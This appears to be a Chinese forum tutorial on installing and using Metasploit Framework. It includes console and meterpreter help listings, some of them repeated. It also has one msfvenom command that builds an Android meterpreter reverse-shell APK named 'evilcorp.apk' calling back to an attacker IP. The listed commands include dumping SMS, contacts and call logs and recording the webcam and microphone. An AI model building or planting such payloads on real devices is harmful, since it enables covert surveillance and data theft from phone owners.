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发表于 2024-6-3 23:32:41 | 显示全部楼层 |阅读模式
Metasploit Framework (MSF)是目前所能接触到的软件渗透测试工具中最知名的工具,包括数千个工具和模块,可用于探索和利用漏洞、执行调查、测试和工具/有效负载创建等,对攻击者、防御者来说都是爱恨交加。


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Metasploit Framework

  1. apt-get update && apt-get upgrade
2. 安装所有依赖
  1. apt install -y git ruby ruby-dev build-essential zlib1g zlib1g-dev libpq-dev libpcap-dev libsqlite3-dev
3. 克隆官方git库
  1. git clone https://github.com/rapid7/metasploit-framework.git
4. 安装ruby的bundler包管理器
  1. gem install bundler
5. 进目录并安装:
  1. cd metasploit-framework && bundle install
6. go
  1. ./msfconsole
msf-potian > help

Core Commands

    Command       Description
    -------       -----------
    ?             Help menu
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    debug         Display information useful for debugging
    exit          Exit the console
    features      Display the list of not yet released features that can be opted in to
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    grep          Grep the output of another command
    help          Help menu
    history       Show command history
    load          Load a framework plugin
    quit          Exit the console
    repeat        Repeat a list of commands
    route         Route traffic through a session
    save          Saves the active datastores
    sessions      Dump session listings and display information about sessions
    set           Sets a context-specific variable to a value
    setg          Sets a global variable to a value
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    tips          Show a list of useful productivity tips
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    version       Show the framework and console library version numbers

Module Commands

    Command       Description
    -------       -----------
    advanced      Displays advanced options for one or more modules
    back          Move back from the current context
    clearm        Clear the module stack
    favorite      Add module(s) to the list of favorite modules
    info          Displays information about one or more modules
    listm         List the module stack
    loadpath      Searches for and loads modules from a path
    options       Displays global options or for one or more modules
    popm          Pops the latest module off the stack and makes it active
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    reload_all    Reloads all modules from all defined module paths
    search        Searches module names and descriptions
    show          Displays modules of a given type, or all modules
    use           Interact with a module by name or search term/index

Job Commands

    Command       Description
    -------       -----------
    handler       Start a payload handler as job
    jobs          Displays and manages jobs
    kill          Kill a job
    rename_job    Rename a job

Resource Script Commands

    Command       Description
    -------       -----------
    makerc        Save commands entered since start to a file
    resource      Run the commands stored in a file

Database Backend Commands

    Command           Description
    -------           -----------
    analyze           Analyze database information about a specific address or address range
    db_connect        Connect to an existing data service
    db_disconnect     Disconnect from the current data service
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
    db_remove         Remove the saved data service entry
    db_save           Save the current data service connection as the default to reconnect on startup
    db_status         Show the current data service status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces

Credentials Backend Commands

    Command       Description
    -------       -----------
    creds         List all credentials in the database

Developer Commands

    Command       Description
    -------       -----------
    edit          Edit the current module or a file with the preferred editor
    irb           Open an interactive Ruby shell in the current context
    log           Display framework.log paged to the end if possible
    pry           Open the Pry debugger on the current module or Framework
    reload_lib    Reload Ruby library files from specified paths
    time          Time how long it takes to run a particular command
  1. search <anything>

  1. use <#number>
  1. show options
1. 可使用INFO查看更多支持的命令,(-d)在浏览器中打开
  1. info
2. 浏览器查看
  1. info -d
  1. msfvenom –p android/meterpreter/reverse_https LHOST=<Your_IP>  LPORT=<Your_Port> R > evilcorp.apk
  1. exploit
Here we go:


Core Commands

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session
    transport                 Manage the transport mechanisms
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel

Stdapi: File system Commands

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcat          Read the contents of a local file to the screen
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands

    Command       Description
    -------       -----------
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getuid        Get the user that the server is running as
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands

    Command       Description
    -------       -----------
    screenshare   Watch the remote user desktop in real time
    screenshot    Grab a screenshot of the interactive desktop

Stdapi: Webcam Commands

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam

Stdapi: Audio Output Commands

    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system

Android Commands

    Command           Description
    -------           -----------
    activity_start    Start an Android activity from a Uri string
    check_root        Check if device is rooted
    dump_calllog      Get call log
    dump_contacts     Get contacts list
    dump_sms          Get sms messages
    geolocate         Get current lat-long using geolocation
    hide_app_icon     Hide the app icon from the launcher
    interval_collect  Manage interval collection capabilities
    send_sms          Sends SMS from target session
    set_audio_mode    Set Ringer Mode
    sqlite_query      Query a SQLite database from storage
    wakelock          Enable/Disable Wakelock
    wlan_geolocate    Get current lat-long using WLAN information

Application Controller Commands

    Command        Description
    -------        -----------
    app_install    Request to install apk file
    app_list       List installed apps in the device
    app_run        Start Main Activty for package name
    app_uninstall  Request to uninstall application

meterpreter > help

Core Commands

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session
    transport                 Manage the transport mechanisms
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel

Stdapi: File system Commands

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcat          Read the contents of a local file to the screen
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands

    Command       Description
    -------       -----------
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getuid        Get the user that the server is running as
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands

    Command       Description
    -------       -----------
    screenshare   Watch the remote user desktop in real time
    screenshot    Grab a screenshot of the interactive desktop

Stdapi: Webcam Commands

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam

Stdapi: Audio Output Commands

    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system

Android Commands

    Command           Description
    -------           -----------
    activity_start    Start an Android activity from a Uri string
    check_root        Check if device is rooted
    dump_calllog      Get call log
    dump_contacts     Get contacts list
    dump_sms          Get sms messages
    geolocate         Get current lat-long using geolocation
    hide_app_icon     Hide the app icon from the launcher
    interval_collect  Manage interval collection capabilities
    send_sms          Sends SMS from target session
    set_audio_mode    Set Ringer Mode
    sqlite_query      Query a SQLite database from storage
    wakelock          Enable/Disable Wakelock
    wlan_geolocate    Get current lat-long using WLAN information

Application Controller Commands

    Command        Description
    -------        -----------
    app_install    Request to install apk file
    app_list       List installed apps in the device
    app_run        Start Main Activty for package name
    app_uninstall  Request to uninstall application


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